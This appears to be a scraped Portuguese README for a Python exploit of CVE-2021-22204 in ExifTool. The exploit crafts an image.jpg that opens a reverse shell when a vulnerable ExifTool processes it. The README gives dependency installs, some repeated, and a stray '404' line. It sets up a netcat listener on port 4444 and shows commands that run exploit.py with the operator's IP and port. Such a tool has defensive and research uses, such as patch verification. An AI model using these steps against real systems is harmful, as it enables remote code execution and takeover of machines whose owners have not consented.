
Exploit em Python para CVE-2021-22204 no ExifTool, gerando uma imagem maliciosa que aciona um reverse shell quando processada por versões vulneráveis.
Exploit em Python para a vulnerabilidade CVE-2021-22204 no Exiftool.
404 não encontrado
python3 python3-pip djvulibre-bin exiftool
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
pacman -S djvulibre libimage-exiftool-perl python python-pip
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
brew install djvulibre exiftool python
apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
sudo pip install -r requirements.txt
nc -nvlp 4444
chmod +x exploit.py
python3 exploit.py {Seu endereço IP} {Sua porta de escuta}
./exploit.py {Seu endereço IP} {Sua porta de escuta}
python3 exploit.py 192.168.0.1 4444
./exploit.py 192.168.0.1 4444
image.jpg
A CVE-2021-22204 foi descoberta e reportada por William Bowling. (@wcbowling)
Este exploit foi criado estudando o patch do exiftool após a CVE já ter sido reportada.
E o image.jpg acionará a vulnerabilidade quando aberto com um exiftool vulnerável.